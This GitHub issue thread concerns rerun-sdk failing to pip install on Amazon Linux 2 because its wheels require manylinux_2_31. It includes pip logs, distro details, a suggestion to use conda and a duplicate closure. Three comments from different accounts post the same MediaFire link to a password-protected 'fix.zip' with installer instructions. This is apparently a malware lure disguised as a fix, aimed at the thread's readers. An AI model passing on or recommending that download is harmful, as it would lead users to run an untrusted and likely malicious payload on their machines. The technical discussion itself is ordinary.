### ISSUE TITLE
Unable to pip install rerun-sdk on Amazon Linux 2

### ISSUE THREAD

**Issue by zacstewart** [rerun-io/rerun#7296]
There are no built distributions available to install on Amazon Linux 2. I'm currently using conda-provided Python, but using yum-provided Python yields the same results.

I  don't understand this very well, but I think the crux of the issue is that rerun-sdk only offers builds for manylinux-2.31 and the latest version available on Amazon Linux 2 is manylinux 2.26.

# Excerpt from pip debug --verbose
```
  cp38-abi3-manylinux_2_26_x86_64
  cp38-abi3-manylinux_2_25_x86_64
  cp38-abi3-manylinux_2_24_x86_64
  cp38-abi3-manylinux_2_23_x86_64
  cp38-abi3-manylinux_2_22_x86_64
  cp38-abi3-manylinux_2_21_x86_64
  cp38-abi3-manylinux_2_20_x86_64
  cp38-abi3-manylinux_2_19_x86_64
  cp38-abi3-manylinux_2_18_x86_64
  cp38-abi3-manylinux_2_17_x86_64
  cp38-abi3-manylinux2014_x86_64
  cp38-abi3-manylinux_2_16_x86_64
  cp38-abi3-manylinux_2_15_x86_64
  cp38-abi3-manylinux_2_14_x86_64
  cp38-abi3-manylinux_2_13_x86_64
  cp38-abi3-manylinux_2_12_x86_64
  cp38-abi3-manylinux2010_x86_64
  cp38-abi3-manylinux_2_11_x86_64
  cp38-abi3-manylinux_2_10_x86_64
  cp38-abi3-manylinux_2_9_x86_64
  cp38-abi3-manylinux_2_8_x86_64
  cp38-abi3-manylinux_2_7_x86_64
  cp38-abi3-manylinux_2_6_x86_64
  cp38-abi3-manylinux_2_5_x86_64
  cp38-abi3-manylinux1_x86_64
```

## Linux Distro

```
$ cat /etc/os-release
NAME="Amazon Linux"
VERSION="2"
ID="amzn"
ID_LIKE="centos rhel fedora"
VERSION_ID="2"
PRETTY_NAME="Amazon Linux 2"
ANSI_COLOR="0;33"
CPE_NAME="cpe:2.3:o:amazon:amazon_linux:2"
HOME_URL="https://amazonlinux.com/"
SUPPORT_END="2025-06-30"
``` 

## Pip Install

```
$ pip install -vv rerun-sdk
Using pip 24.0 from /opt/conda/lib/python3.10/site-packages/pip (python 3.10)
Defaulting to user installation because normal site-packages is not writeable
Created temporary directory: /tmp/pip-build-tracker-hi6vyt8x
Initialized build tracking at /tmp/pip-build-tracker-hi6vyt8x
Created build tracker: /tmp/pip-build-tracker-hi6vyt8x
Entered build tracker: /tmp/pip-build-tracker-hi6vyt8x
Created temporary directory: /tmp/pip-install-geq6iv0b
Created temporary directory: /tmp/pip-ephem-wheel-cache-srl7omw3
1 location(s) to search for versions of rerun-sdk:
* https://pypi.org/simple/rerun-sdk/
Fetching project page and analyzing links: https://pypi.org/simple/rerun-sdk/
Getting page https://pypi.org/simple/rerun-sdk/
Found index url https://pypi.org/simple/
Looking up "https://pypi.org/simple/rerun-sdk/" in the cache
Request header has "max_age" as 0, cache bypassed
Starting new HTTPS connection (1): pypi.org:443
https://pypi.org:443 "GET /simple/rerun-sdk/ HTTP/1.1" 304 0
Fetched page https://pypi.org/simple/rerun-sdk/ as application/vnd.pypi.simple.v1+json
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/f0/a3/e25cf3fe609ede853794206c668997948d7b3ceb6371675fb39bcceea022/rerun_sdk-0.17.0a4-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/07/9c/bab535affb0bb44bb20c111bd92abc4c8a1f8a2c08a681f2464e394b1b41/rerun_sdk-0.17.0a4-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/95/46/e8f3ae3caf1eb35db9720481deb2ea8e839723a97969cde4d4fa84c4a57e/rerun_sdk-0.17.0a4-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/06/23/f74fdaaefa401cf5c4b8b7a740ccca61c9976752ce2db7cff2daa10a5ee6/rerun_sdk-0.17.0a4-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/eb/7e/3ab317e966717dd2d2171371c8bc5e94266e6c8d3bf126e2bba3c60af458/rerun_sdk-0.17.0a4-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/4d/c7/00fee180b02a06388f209c3370ac3ab3f061b7713e15cddac5b5b0b26fbe/rerun_sdk-0.17.0a6-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/b0/df/3c3753be7f5f8c2dc5912f7887977a1bbca2ab500ee227aad28b47a8b97b/rerun_sdk-0.17.0a6-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/00/a5/a41e426d5e75070a6e652bc5aa26408334cdcaa31e1fe21d26c76260064c/rerun_sdk-0.17.0a6-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/da/47/39be8a1370ab5ecb8aa0ed68ff18620f0ccbd3c2e895bdee7130b52e80ce/rerun_sdk-0.17.0a6-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/ad/0f/7e7c8631cd283d362db70d124e32a55d9a2f63e68f45710b6ee975ce524f/rerun_sdk-0.17.0a6-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/22/3c/a622d5288bd9cb23be5eac00fd2315325e0114227257c5b1c7df74cf8964/rerun_sdk-0.17.0a8-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/48/16/87ec7132c060dd7bd55b984b9fc5946610d21de49877f9dd260ce8972ffb/rerun_sdk-0.17.0a8-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/91/f3/499d7eb28c6689ae3cd483d9d7c080dfc18cd5505e93a470d761d117d27a/rerun_sdk-0.17.0a8-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/02/8c/7aa354fefd9227494ae9d8ddc54770dedd4399d08eeba1b06bba92b73769/rerun_sdk-0.17.0a8-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/b3/63/18af31ae323b6bfb73d84916da7a1c1e37cb2f7df3c7933b32ec49f93506/rerun_sdk-0.17.0a8-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/14/e6/835e7ecce6d52fdf956f916852eeaf149cc5bf92dbd341046d8edc17d2f0/rerun_sdk-0.17.0a9-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/a1/7e/00f97b8ab1ed447e47de52b980bee10254a1e4d13cac16e9995bc26d0a58/rerun_sdk-0.17.0a9-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/f7/ad/0a82e791f53009000b4ebfc14989ce9b818443a0d9f3767134977cc5ee74/rerun_sdk-0.17.0a9-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/b1/df/5da1a5786f3478fb5709bb6ad64e0a8582fb223da3a2d9474d22a29d96cf/rerun_sdk-0.17.0a9-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/c5/5c/2ca4abafefa7df8a47d04a9b04b46641fdef31ac7bc4ccbdd38889fbad5c/rerun_sdk-0.17.0a9-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/ac/91/036d9b087fc49aeb4882d50f6b1ffd46ef6df35ed9a5b42801ce98d2f4ae/rerun_sdk-0.17.0rc1-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/be/c9/0725a9958d0a6d2cab54b1cf8750dd4561f81d382872842ed7b93d9d80d8/rerun_sdk-0.17.0rc1-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/6d/03/b9f85addbc081ac6d7d2571e3a67803e4287652df71385a8bb2aa6f3d8fb/rerun_sdk-0.17.0rc1-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/bf/17/f55ca234897cd2f34afb345ee5db9c294b72c9b1f03392869ff94f3ffbc7/rerun_sdk-0.17.0rc1-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/01/b3/c2b39a69652c5733fc9a8e1d6c3057c989124613e689cede52de1226456d/rerun_sdk-0.17.0rc1-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/08/c6/898ea78c4b8acec3beeb82a22cc03f396f9ec851765ab3d4e9200ce4b8b2/rerun_sdk-0.17.0rc2-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/4a/80/214469d707e9fc11f8d1a7abd98974d3dbbcfd00fbd3c8b41ae017ad6853/rerun_sdk-0.17.0rc2-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/1d/3d/070cf8b5df104b66a49ba8365f19d9b7f84cfe8791b66ad16339f9fffb92/rerun_sdk-0.17.0rc2-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/3a/7a/ce7fc1c23edd0a2710eff192825a664201321831d7a8d903cb6358ed6327/rerun_sdk-0.17.0rc2-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/81/b0/1fd1d5cb00a595342ed06ea00b68150ef8a26a56622ffe7916baf928ac14/rerun_sdk-0.17.0rc2-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/d6/17/42d0d7ff24c009f7a3c7a95570ceea4f4784a5ff69e116e06a74a906d099/rerun_sdk-0.17.0rc3-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/36/79/4c5bbc0b7aad687477c865c139a5d2b5952e432a9ca30c7f6e135ea5c745/rerun_sdk-0.17.0rc3-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/41/db/47c9a6079f86cc9499e69ed87e57f18e790ca0b0a3064ab1c2d18f91bda3/rerun_sdk-0.17.0rc3-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/5a/ae/7cbf5d776df480e0c1d03670aa99856f735cbe82a0e217623327bcb5a17a/rerun_sdk-0.17.0rc3-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/b7/8c/951738b660a5efc92d626c3b5cf88712ec0cb12d3641f57b74e936fc1960/rerun_sdk-0.17.0rc3-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_10_12_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/30/5f/ce02381b9d7e1e14f60c421c76dce12b7d823690181784780b30266017b1/rerun_sdk-0.17.0-cp38-abi3-macosx_10_12_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-macosx_11_0_arm64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/b7/c5/d47ba7b774bc563aa3c07ba500dd304ea24b31fe438e10ea9ad5e10ffe17/rerun_sdk-0.17.0-cp38-abi3-macosx_11_0_arm64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_aarch64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/87/0a/b5fe1ffea700eeaa8d28817a92ad3cb4a7d56dc4af45de76ea412cfc5cd5/rerun_sdk-0.17.0-cp38-abi3-manylinux_2_31_aarch64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-manylinux_2_31_x86_64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/d9/74/6c1ff0c8dbe6da09ceb5ea838a72382fa3131ef6bb9377a30003299743fa/rerun_sdk-0.17.0-cp38-abi3-manylinux_2_31_x86_64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
  Skipping link: none of the wheel's tags (cp38-abi3-win_amd64) are compatible (run pip debug --verbose to show compatible tags): https://files.pythonhosted.org/packages/8c/28/92423fe9673b738c180fb5b6b8ea4203fe4b02c1d20b06b7fae79d11cc24/rerun_sdk-0.17.0-cp38-abi3-win_amd64.whl (from https://pypi.org/simple/rerun-sdk/) (requires-python:<3.13,>=3.8)
Skipping link: not a file: https://pypi.org/simple/rerun-sdk/
Given no hashes to check 0 links for project 'rerun-sdk': discarding no candidates
ERROR: Could not find a version that satisfies the requirement rerun-sdk (from versions: none)
ERROR: No matching distribution found for rerun-sdk
Exception information:
Traceback (most recent call last):
  File "/opt/conda/lib/python3.10/site-packages/pip/_vendor/resolvelib/resolvers.py", line 397, in resolve
    self._add_to_criteria(self.state.criteria, r, parent=None)
  File "/opt/conda/lib/python3.10/site-packages/pip/_vendor/resolvelib/resolvers.py", line 174, in _add_to_criteria
    raise RequirementsConflicted(criterion)
pip._vendor.resolvelib.resolvers.RequirementsConflicted: Requirements conflict: SpecifierRequirement('rerun-sdk')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/resolution/resolvelib/resolver.py", line 95, in resolve
    result = self._result = resolver.resolve(
  File "/opt/conda/lib/python3.10/site-packages/pip/_vendor/resolvelib/resolvers.py", line 546, in resolve
    state = resolution.resolve(requirements, max_rounds=max_rounds)
  File "/opt/conda/lib/python3.10/site-packages/pip/_vendor/resolvelib/resolvers.py", line 399, in resolve
    raise ResolutionImpossible(e.criterion.information)
pip._vendor.resolvelib.resolvers.ResolutionImpossible: [RequirementInformation(requirement=SpecifierRequirement('rerun-sdk'), parent=None)]

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/cli/base_command.py", line 180, in exc_logging_wrapper
    status = run_func(*args)
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/cli/req_command.py", line 245, in wrapper
    return func(self, options, args)
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/commands/install.py", line 377, in run
    requirement_set = resolver.resolve(
  File "/opt/conda/lib/python3.10/site-packages/pip/_internal/resolution/resolvelib/resolver.py", line 104, in resolve
    raise error from e
pip._internal.exceptions.DistributionNotFound: No matching distribution found for rerun-sdk
Remote version of pip: 24.2
Local version of pip:  24.0
Was pip installed by pip? False
Removed build tracker: '/tmp/pip-build-tracker-hi6vyt8x'
```

[pip debug.txt](https://github.com/user-attachments/files/16781676/pip.debug.txt)

**Comment by jleibs** [comment]
Since you're using conda-provided python, is it an option to also use conda-provided rerun? Our conda packages are generally more portable due to how the conda build tooling works.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zacstewart** [comment]
Yes, I've used the conda installation successfully, but the goal is to remove dependence on conda from our deployment because we have a weird mixture of conda and pip right now that is becoming pain to sustain.

**Comment by arhanjain** [comment]
same issue here but on rocky linux
```
NAME="Rocky Linux"
VERSION="8.9 (Green Obsidian)"
ID="rocky"
ID_LIKE="rhel centos fedora"
VERSION_ID="8.9"
PLATFORM_ID="platform:el8"
PRETTY_NAME="Rocky Linux 8.9 (Green Obsidian)"
ANSI_COLOR="0;32"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:rocky:rocky:8:GA"
HOME_URL="https://rockylinux.org/"
BUG_REPORT_URL="https://bugs.rockylinux.org/"
SUPPORT_END="2029-05-31"
ROCKY_SUPPORT_PRODUCT="Rocky-Linux-8"
ROCKY_SUPPORT_PRODUCT_VERSION="8.9"
REDHAT_SUPPORT_PRODUCT="Rocky Linux"
REDHAT_SUPPORT_PRODUCT_VERSION="8.9"
```

using UV for dependency resolution - ideally wouldn't need conda just for rerun

**Comment by aedm** [comment]
Duplicate of #2628. Same root cause: the wheel manylinux_2_31 tag is too new for older glibc distros, breaking pip install. Consolidating discussion into #2628.
